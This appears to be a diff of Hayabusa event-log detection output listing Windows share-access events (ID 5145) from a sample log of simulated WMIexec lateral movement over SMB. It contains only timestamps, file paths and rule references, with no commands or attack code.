+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Links\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Music\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176#\0e765b6e054c8bac98f30ced03330615 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Pictures\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Saved Games\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4#\37b337245bcc60a0f8c6cc814157fd9f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Searches\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Videos\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a#\ff89d7fa29ebae7dfdd1cf2db43686dc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d#\0658126a7d3bc7b0e7f548f2e3a423fb | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001#\8505e29c9b52cf09d67343a0fc6f6260 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664#\4b78e11f2ba008b681ae84f8d5ffda55 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9#\11adbe13e64f66d322e04cd718460b97 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb#\8b123051103ee49fa11dd81c04427182 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls\26985cb1bb8c065a2e50e5ac0791fbeb | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx\ba21ae2888a2764f3d0df9ccd1e95506 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon\e2ac72add0eac7c6264297f0a580e745 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild\5eda447ab5fd1d3ae7ccfa140388c8b0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\a20cafac04a2e9b3bcb5ec4d674775e5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt\c97155692ee6bc8729624e1a8f6371c1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr\8d352c21be1bcfb356df6fec4b6281ec | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napinit | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napinit\d39a7c06edcf81bed4470b0a8a5f4bb7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napsnap | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napsnap\285c011d18a31026f939f0b45ce83c81 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57#\15c0f15336d9b4baa3bf042b39325008 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8#\63dfa31687b025a3294657e7d8861b87 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67#\65893eb6f605719418cb19fada199945 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64#\7258b8e8dc26562f4f79202ba192af07 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f#\37aa83ffa60682e364b3caea876452c9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe#\504088f50d79f510c3d363ad5a4c58cc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c#\7b19e9c40f25ea7b5ca13312053ab849 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
